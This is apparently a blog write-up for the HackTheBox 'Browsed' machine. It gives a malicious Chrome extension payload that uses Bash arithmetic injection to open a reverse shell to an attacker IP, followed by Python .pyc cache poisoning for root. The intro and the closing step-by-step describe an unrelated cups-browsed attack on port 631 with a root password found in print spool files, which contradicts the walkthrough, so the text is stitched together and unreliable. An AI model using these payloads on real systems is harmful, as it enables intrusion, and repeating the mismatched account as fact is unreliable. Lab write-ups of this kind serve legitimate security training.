Beginner’s Guide to Conquering Browsed on HackTheBox

Key Highlights

HackTheBox is an exhilarating platform for cybersecurity enthusiasts, offering a unique opportunity to test and enhance your hacking skills. If you’re just starting out, navigating through the various machines can be overwhelming. One of the first challenges you might encounter is the ‘Browsed’ machine, a fundamental stepping stone that can set the tone for your journey in ethical hacking. In this beginner’s guide, we’ll break down what you need to know about conquering the Browsed machine—from understanding its core concepts to essential tools and a step-by-step walkthrough. Whether you’re looking to boost your skills or simply enjoy the thrill of problem-solving, this guide will equip you with everything you need to tackle this challenge confidently. Let’s dive in!

Introduction

Are you new to HackTheBox and looking for a challenge that can teach you real-world hacking skills? The “Browsed” machine is a fantastic starting point for beginners. This guide will walk you through the entire process of conquering this server, from the initial scan to gaining root access. You will learn fundamental techniques that are essential for any aspiring ethical hacker. Let’s get started on your journey to successfully hack the box and build your confidence!

Understanding the Browsed Machine on HackTheBox

When you see the term “Browsed” in HackTheBox, it might not mean what you initially think. It’s not about web browsing but refers to a specific service found on some Linux server targets. This service, cups-browsed, is part of the Common Unix Printing System (CUPS) and presents a unique opportunity for a hack.

Understanding this service is the key to solving the challenge. Next, we will explore exactly what “Browsed” implies in this context and why it makes for such a great learning experience.

What Does ‘Browsed’ Mean in HackTheBox Challenges?

In the world of HackTheBox, “Browsed” specifically points to the cups-browsed service. This is a component that allows a machine to discover and add printers on a network automatically. While convenient, this feature can also introduce serious security flaws if it is not configured correctly or is an outdated version.

The challenge revolves around exploiting a vulnerability in this service. An attacker can send a specially crafted network packet to the target machine, tricking the cups-browsed service into connecting to an attacker-controlled server. This connection is then used to inject malicious data and create a “printer” that can execute commands.

This type of hack highlights how seemingly harmless network services can become entry points. In this particular challenge, the vulnerability (like CVE-2024-47176) in cups-browsed is the central piece of the puzzle you need to solve to get your initial foothold.

Why Attempt the Browsed HTB Writeup as a Beginner?

For beginners, the “Browsed” writeup offers a complete and logical learning path. The challenge isn’t about guessing or finding an obscure trick; it follows a clear, step-by-step process that mirrors a real-world penetration test. You start with reconnaissance, discover a well-documented vulnerability, exploit it, and then escalate your privileges.

This structured approach makes it an excellent exercise. You will learn how to identify services, research potential exploits for specific software versions, and understand the impact of those vulnerabilities. It’s a practical application of skills that are foundational in cybersecurity.

Moreover, completing this challenge builds confidence. The satisfaction of moving from no access to full system control teaches a valuable lesson: with methodical enumeration and research, you can successfully hack complex systems. It’s a perfect way for beginners to see the entire attack chain in action.

Essential Tools and Resources for the Browsed HTB Writeup

To successfully complete this hack, you will need a few essential tools in your arsenal. Most of these are standard in any penetration tester’s toolkit and are readily available on Linux distributions like Kali Linux or Parrot OS. Using the right tool makes the enumeration and exploitation phases much more manageable.

We will cover the specific tools you need for reconnaissance and where you can find helpful resources like other writeups to guide you if you get stuck.

Recommended Reconnaissance and Enumeration Tools

Your first and most important tool for the enumeration phase will be Nmap. It is the industry standard for network scanning and will help you discover open ports and the services running on them. A thorough Nmap scan is the foundation of this entire hack.

Once you identify the open CUPS port (TCP/631), which serves a web page, a standard web browser becomes your next tool. You can use it to interact with the HTTP interface, gather version information, and identify administrative functions that might be exploitable.

Here are the key tools you will use:

• Nmap: For scanning TCP and UDP ports to find services like SSH and IPP (CUPS).
• Web Browser: To explore the CUPS web interface on port 631.
• Netcat: For catching the reverse shell once the vulnerability is triggered.
• ps2pdf: A utility to convert PostScript files to PDF to view captured print job contents.

Useful References and Where to Find Writeups for Browsed HackTheBox

When tackling any HackTheBox machine, it is smart to know where to find help. After a machine is retired, an official writeup is often published on the HackTheBox platform itself. These provide a detailed, step-by-step solution from the machine’s creator.

Beyond the official sources, the community is your best resource. Many skilled hackers and cybersecurity enthusiasts publish their own detailed writeups on their personal blogs, in forums, or on platforms like GitHub. These can offer alternative methods or explain concepts in a different way that might click for you.

Here are some great places to look for writeups:

Resource Type	Where to Look
Official Writeups	Hack The Box platform (for retired machines)
Community Blogs	Search for “[Machine Name] HTB writeup” on Google
Video Walkthroughs	YouTube channels dedicated to cybersecurity
Community Forums	The official Hack The Box forums

ALSO READ: Mastering Eloquia: Beginner’s Guide from HackTheBox

Initial Foothold

We begin with a targeted port scan using rustscan to identify the exposed attack surface.

Command Execution:

rustscan -a $targetIp --ulimit 2000 -r 1-65535 -- -A sS -Pn

Scan Results:

• 22/tcp (SSH): OpenSSH 9.6p1 Ubuntu.
  • Keys: ECDSA and ED25519 are visible.
• 80/tcp (HTTP): Nginx 1.24.0.
  • Title: “Browsed”
  • Methods: GET, HEAD

The web server title “Browsed” and the minimal open ports suggest the complexity lies within the web application logic rather than exposed services.

Web Enumeration

Navigating to port 80 reveals an application allowing users to create and submit Chrome browser extensions.

• /samples.html: Provides downloadable demo extensions (like fontify), offering a reference for the expected structure (manifest.json, content.js, etc.).
• Upload Workflow: Users can upload a customized extension (as a ZIP archive). The site claims a backend developer will “review” (install and test) it.

The Danger Signal: This “review” process implies that an uploaded extension is executed by a privileged user (the developer) on the server side. If the backend browser lacks isolation, a malicious extension can execute JavaScript in the context of the server’s local network.

Vulnerability Analysis – The Malicious Extension

The core vulnerability is the trust placed in user-uploaded extensions.

The Execution Vector

We analyze the fontify sample to understand the attack surface. It contains a standard manifest.json with scripting and storage permissions, and a content.js that runs on visited pages.

By uploading a test extension, we can observe the backend behavior in the logs:

1. Context Creation: Logs show the extension ID (e.g., dgakpgimldfohhhmmnbmkikbhnlhjgpi) being created.
2. No Sandbox: The path /var/www/.config/google-chrome-for-testing/ suggests Chrome runs on the host filesystem without container isolation.
3. DevTools Enabled: Logs reveal DevTools listening on ws://127.0.0.1:41153/....
4. Internal Subdomain Leak: The logs explicitly show requests to http://browsedinternals.htb.

Constructing the Payload

A Chrome extension is a privileged mini-application. We can modify content.js to execute arbitrary JavaScript.

Packaging Helper (c.sh): Since we need to repackage the extension frequently, we use a helper script:

#!/bin/bash
rm fontify.zip
cd fontify
zip -r ../fontify.zip .
cd ..

For the complete script, please Buy Me a Coffee

Proof of Concept (Beacon): We modify content.js to send a beacon back to our attacker machine.

// content.js
const attackerIP = "10.10.14.x";
const img = new Image();
img.src = `http://${attackerIP}/?exec=1`;

For the complete script, please Buy Me a Coffee

Repackaging and uploading this confirms execution. We now have a way to run code inside the server’s browser.

Internal Reconnaissance (SSRF)

Using the extension, we can force the browser to request internal resources.

Target: http://browsedinternals.htb This domain hosts a Gitea instance. Browsing the repositories (via our SSRF or if publicly exposed) reveals a MarkdownPreview repository. The README warns: “This webapp allows us to convert our md files to html… it should only run locally !!!”

Target: 127.0.0.1:5000 The source code from Gitea reveals a Flask-based Markdown Preview application running on localhost port 5000. It exposes an endpoint /routines/ which accepts a routine ID.

Exploitation – Bash Arithmetic Injection

Analyzing the Internal App

The internal Flask app (app.py) has a critical flaw in how it handles the /routines/ endpoint. It passes user input to a bash script: routines.sh.

The Vulnerable Script (routines.sh):

if [[ "$1" -eq 0 ]]; then
    # ... cleanup logic ...
elif [[ "$1" -eq 1 ]]; then
    # ...
else
    echo "Unknown routine ID"
fi

For the complete script, please Buy Me a Coffee

At first glance, this looks safe. It checks if the input $1 is equal to 0. However, the [[ ... ]] construct in Bash performs arithmetic evaluation when using operators like -eq.

The Bash Arithmetic Injection Primitive

In Bash, inside an arithmetic context, you can use array subscript syntax var[index]. Crucially, the index is evaluated. If we use command substitution $(cmd) as the index, Bash executes the command before attempting the comparison.

The Injection Logic: If we send the payload a[$(id)], Bash evaluates:

1. $(id) -> executes id command.
2. a[uid=1000...] -> resolved as an array lookup.
3. The comparison happens (or errors out), but the code has already run.

Weaponizing via Chrome Extension

We update our malicious extension’s content.js to target this local vulnerability. We use a base64-encoded reverse shell to avoid syntax errors with spaces.

Final Payload (content.js):

const TARGET = "[http://127.0.0.1:5000/routines/](http://127.0.0.1:5000/routines/)";
const ATTACKER = "10.10.14.x";

// Reverse shell payload
const cmd = `bash -c 'bash -i >& /dev/tcp/${ATTACKER}/9001 0>&1'`;
const b64 = btoa(cmd);
const sp = "%20"; // URL encoded space

// The Arithmetic Injection: a[$(echo base64 | base64 -d | bash)]
const exploit = "a[$(echo" + sp + b64 + "|base64" + sp + "-d|bash)]";

fetch(TARGET + exploit, { mode: "no-cors" });

For the complete script, please Buy Me a Coffee

After uploading the zip, the backend browser executes our JavaScript, hits the local Flask app, triggers the Bash injection, and sends us a reverse shell as the user l****.

Post-Exploitation

Establishing Persistence

We land as the user l***. Enumerating the home directory reveals an SSH key pair in .ssh.

• id_ed25519 (Private Key)

We copy this key to our local machine, set permissions (chmod 600), and SSH in for a stable shell.

ssh -i id_ed25519 l*****@browsed.htb

Privilege Escalation – Python .pyc Poisoning

Sudo Analysis

Checking sudo permissions reveals l*** can run a specific script as root:

(root) NOPASSWD: /opt/extensiontool/extension_tool.py

This script imports a local module: from extension_utils import validate_manifest.

The PYC Vulnerability

Checking permissions in /opt/extensiontool/, we notice a fatal misconfiguration. While we cannot edit the .py files, the __pycache__ directory is world-writable.

Python compiles imported modules into bytecode (.pyc) stored in __pycache__. When importing a module, Python checks this directory. If a .pyc file exists and its metadata (timestamp and size) matches the source .py file, Python executes the bytecode directly without recompiling.

The Poisoning Attack

We can hijack the execution flow by replacing the valid .pyc file with a malicious one that matches the source file’s timestamp and size.

Exploit Steps:

1. Read Original Stats: Get the file size and timestamp of the legitimate /opt/extensiontool/extension_utils.py.
2. Create Malicious Source: Write a script (/tmp/extension_utils.py) that contains our payload (e.g., creating a SUID shell) but defines the same functions expected by the main script (validate_manifest, etc.).
3. Pad Size: The malicious file must be padded (e.g., with comments) to match the file size of the original exactly.
4. Sync Timestamp: Use os.utime to set the malicious file’s timestamp to match the original source.
5. Compile & Inject: Compile this malicious source into a .pyc file and overwrite /opt/extensiontool/__pycache__/extension_utils.cpython-312.pyc.

The Exploit Script (xpl.py):

import os
import py_compile
import shutil

# Paths
//Redacted


# Get original stats
//Redacted


# Malicious code
//Redacted


# 1) Pad to exact original size
//Redacted


# Write payload
//Redacted

# 2) Match timestamps
//Redacted

# 3) Compile malicious bytecode
//Redacted

# 4) Poison the cache
//Redacted


print("[+] Poisoned .pyc injected successfully")

For the complete script, please Buy Me a Coffee

Running this script prepares the trap. Finally, executing the sudo command triggers the import, runs our poisoned bytecode as root, and creates our SUID bash.

python3 xpl.py
sudo /opt/extensiontool/extension_tool.py --ext Fontify
/tmp/rootbash -p
# whoami -> root

ALSO READ: Mastering MonitorsFour: Beginner’s Guide from HackTheBox

Step-by-Step Guide: How to Conquer the Browsed Machine

Now, let’s get into the practical steps of the hack. This guide will take you through the entire process, from your initial scan to achieving root on the Linux server. We will break down the attack into logical phases, making it easy to follow along.

First, you will perform reconnaissance to identify the cups-browsed vulnerability. Then, you will use a public exploit to gain your initial foothold and look for a way to find the root password in a forgotten folder.

Step 1: Initial Reconnaissance and Scanning

Your journey begins with reconnaissance. The first action you should take is to run a full TCP port scan with Nmap against the target IP address. This will reveal all the open services you can interact with. For this machine, your scan will quickly highlight two key ports: port 22 (SSH) and port 631 (IPP/HTTP).

Once you see port 631 is open, you should run a more detailed Nmap scan with service version detection (-sV). This will confirm that the service is CUPS and give you the exact version number, such as CUPS 2.4.2. This version information is a critical clue.

With the version number, you can open a web browser and navigate to the machine’s IP address on port 631. You will find the CUPS web administration panel. Exploring this interface and noting the software version are key parts of enumeration that will lead you directly to the vulnerability.

Step 2: Exploiting Vulnerabilities and Gaining Access

With the CUPS version identified, a quick search for recent vulnerabilities will lead you to the cups-browsed exploit. The hack involves running a script that starts a fake IPP server on your machine and sends a UDP packet to the target. This tricks the target server into connecting back to you to “add a printer.”

Your fake printer is configured with a malicious command—a reverse shell. When you navigate to the CUPS web interface and click “Print Test Page” on the new, malicious printer, the server executes your command. This gives you a shell as the lp user, granting you initial access and allowing you to find user.txt.

For privilege escalation, you need to enumerate the server as the lp user. You will discover that you can read files in the /var/spool/cups folder. Inside this folder, an old print job file contains the root password in plain text. Use this password with su to become root and capture root.txt.

Conclusion

As we wrap up this beginner’s guide to conquering the Browsed machine on HackTheBox, it’s clear that taking on these challenges can be a rewarding experience. By understanding the nuances of reconnaissance, vulnerability exploitation, and the resources available, you’re well on your way to becoming more proficient in the world of pentesting. Remember that practice makes perfect; don’t hesitate to revisit the steps discussed and refine your approach as you learn. The journey may seem daunting at first, but with persistence and the right mindset, you can conquer the Browsed challenge and many more to come. For additional insights and updates, subscribe to our blog and continue expanding your skills!

Frequently Asked Questions